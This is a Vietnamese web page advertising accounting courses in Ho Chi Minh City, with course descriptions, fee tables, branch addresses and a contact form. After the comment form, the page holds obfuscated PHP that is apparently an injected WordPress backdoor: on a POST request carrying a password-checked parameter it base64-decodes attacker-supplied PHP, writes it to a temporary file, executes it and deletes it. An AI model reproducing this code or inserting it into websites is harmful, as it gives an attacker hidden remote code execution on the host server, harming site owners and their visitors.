1

KẾ TOÁN HÀ NỘI tại TPHCM

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Các địa chỉ học kế toán tại tpHCM của KẾ TOÁN HÀ NỘI GROUP trực thuộc:

 1. KẾ TOÁN HÀ NỘI tại Lê Văn Chí Thủ Đức
 2. KẾ TOÁN HÀ NỘI tại CMT8 Quận 3
 3. KẾ TOÁN HÀ NỘI tại Vân Côi Tân Bình
 4. KẾ TOÁN HÀ NỘI tại Nguyễn Văn Vịnh Tân Phú
 5. KẾ TOÁN HÀ NỘI tại Ngô Tất Tố Bình Thạnh

Và còn rất nhiều quận Huyện khác và tỉnh thành khác: KẾ TOÁN HÀ NỘI tại thủ dầu 1 Bình Dương, KẾ TOÁN HÀ NỘI tại Biên Hòa Đồng Nai, KẾ TOÁN HÀ NỘI tại Ninh Kiều Cần Thơ… hầu khắp các tỉnh thành KẾ TOÁN HÀ NỘI cũng đều có mặt, theo tiêu chí ” Ở đâu cần học kế toán thực tế ở đó có KẾ TOÁN HÀ NỘI” .

KẾ TOÁN HÀ NỘI GROUP mở các khóa học tại các tỉnh thành quận huyện với đội ngũ giáo viên đều là kế toán trưởng trên 10 năm kinh nghiệm cầm tay chỉ việc cho học viên giúp các bạn làm chủ công việc của mình trên chứng từ sống.

 1. – Bạn đang cần tìm học chứng chỉ kế toán tại tphcm? Bạn muốn tìm địa chỉ học kế toán ở đâu tốt tphcm để sau này đi làm thực tế tại doanh nghiệp ? Bạn đang là kế toán viên nhưng trước giờ bạn chỉ làm công việc kế toán như: kế toán bán hàng, kế toán công nợ, kế toán kho… và bây giờ muốn học tổng hợp để có thể đảm nhiệm vị trí cao hơn trong công ty hoặc có thu nhập cao hơn??
 2. – Bạn chưa biết gì về kế toán? chưa từng học kế toán bao giờ? hay đã học rồi nhưng không đi làm đúng ngành hoặc vì các lý do khác mà bây giờ muốn quay lại nhưng hầu như đã quên gần hết..?
  Vậy thì mời bạn tham gia học lớp kế toán từ đầu nhé, để biết chi tiết nội dung khóa học hay học phí và thời gian học mời bạn ấn vào link: KHÓA KẾ TOÁN CHO NGƯỜI CHƯA BIẾT
 3. – Bạn đã học kế toán rồi như sinh viên mới ra trường chưa có kinh nghiệm thực tế hay đang đi làm nhưng là không phải kế toán tổng hợp muốn học chuyên sâu để có thể đảm nhiệm cũng như đổi vị trí kế toán cao hơn trong công ty và có thu nhập tốt hơn thì mời bạn tham gia khóa kế toán chuyên sâu nhé, để biết chi tiết nội dung khóa học hay học phí và thời gian học mời bạn ấn vào link: KHÓA KẾ TOÁN CHO NGƯỜI ĐÃ BIẾT
 4. – Hay bạn là chủ doanh nghiệp chưa biết gì về kế toán muốn học để về làm cho chính công ty hay chỉ để quản lý khi bạn nhìn hồ sơ sổ sách kế toán làm cho biết được họ làm đúng làm đủ làm sai… hay bạn muốn học gia sư riêng 1 kèm 1 với chính chứng từ của bạn và theo đúng phần hành bạn đang đi làm thì trung tâm cũng có những lớp như vậy cho bạn nhé.

Lớp học kế toán cơ bản tại dạy bạn những gì?

Với phương pháp giảng dạy: Học Kế Toán cơ bản từ những chứng từ sống và tình huống thực tế phát sinhtrong các doanh nghiệp, khóa học kế toán thực tế tại tphcm sẽ giúp bạn nắm được các nội dung sau:

 Dạy thủ tục mua hoá đơn, đặt in hoá đơn

 Dạy cách tính thuế, kê khai thuế (Báo cáo thuế tháng, quý, năm)

 Nhập môn kế toán (Nguyên lý kế toán)

 Dạy cách hạch toán thực tế vào sổ sách, lập báo cáo tài chính

 Dạy thủ thuật kế toán, thủ thuật cân đối lãi lỗ cho doanh nghiệp

 Dạy trên chứng từ thực tế theo chế độ kế toán mới nhất

Với mục tiêu nâng cao tính ứng dụng vào thực tiễn, Học viên học xong phải làm được nghề ngay, chương trình học của Lớp Kế Toán cơ bản tại Hà Nội được Hội Đồng Giảng Viên nghiên cứu, cải tiến và đổi mới phù hợp với tình huống kế toán thực tế theo các thông tư, nghị định cập nhật nhất. Hệ thống lý thuyết kế toán kết hợp với các tình huống thường xuyên xảy ra ở các doanh nghiệp. Học viên được cơ bản trực tiếp ngay trên máy bằng các công cụ như Excel, phần mềm Fast, Misa, Bravo….và được giải đáp ngay các câu hỏi thực tế phát sinh trong mỗi buổi học.

Sau khóa học bạn sẽ được gì?

Đến với khóa học này các bạn sẽ học được: cách thiết lập sổ sách, chứng từ, định khoản, vào sổ và lưu chứng từ, xử lý các tình huống phát sinh thực tế tại các doanh nghiệp.

Chúng tôi cam kết sau khóa học, bạn có thể tự lập thực hiện được tất cả các kỹ năng công việc cơ bản của một kế toán viên trong một doanh nghiệp theo đúng những chuẩn mực quy định hiện hành

Sau khóa học Kế toán thực tế học viên có thể tự tin khi đi phỏng vấn tuyển dụng và làm chủ công việc kế toán thực tế trong mỗi doanh nghiệp. Bên cạnh đó, có thể tư vấn cho Giám Đốc về các tình huống kế toán trong doanh nghiệp. Từ đó, biết cách hoạch định kế hoạch phát triển bản thân lâu dài.

Học phí các Lớp học kế toán cơ bản tại Hà Nội có những ưu đãi gì mới?

Khóa học

Thời gian học

Thời lượng

Học phí chưa giảm

Học phí ưu đãi cho sinh viên

Học phí ưu đãi cho đối tượng khác

Khoá học cho người đã học kế toán Sáng: 8h30 – 11h;

Chiều: từ 14h – 16h30;

Tối: từ 18h – 20h30.

CA CHỦ NHẬT: cả ngày

Mỗi khoá học từ 28 – 32 buổi tuỳ theo đối tượng học viên 3.000.000đ 1.500.000đ

(Giảm 50%)

1.500.000đ

(Giảm 50%)

Khoá học cho người chưa học kế toán 4.000.000đ 2.000.000đ

(Giảm 50%)

2.000.000đ

(Giảm 50%)

 =>> Tư vấn lịch học và đăng ký nhận ưu đãi ngay tại Hotline: Mr Ngọc – 0973.761.751

logo-ke-toan-ha-noi CƠ SỞ ĐÀO TẠO TẠI MIỀN NAM

CS1: Vân Côi – Phường 7 – Quận Tân Bình – TP. Hồ Chí Minh.
CS2: Lê Văn Chí – P.Linh Trung – Quận Thủ Đức – Tp. Hồ Chí Minh.
CS3: Đại Lộ Bình Dương – Hiệp Thành – TP. Thủ Dầu Một – Tỉnh Bình Dương
CS4: Đường Bà Sa – Khu phố Bình Minh 2 – Thị xã Dĩ An – Bình Dương
CS5: Hà Huy Giáp – Phường Quyết Thắng – TP. Biên Hòa – Tỉnh Đồng Nai.
CS 6: Phan Chu Trinh – TP. Vũng Tàu – Tỉnh Bà Rịa – Vũng Tàu

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}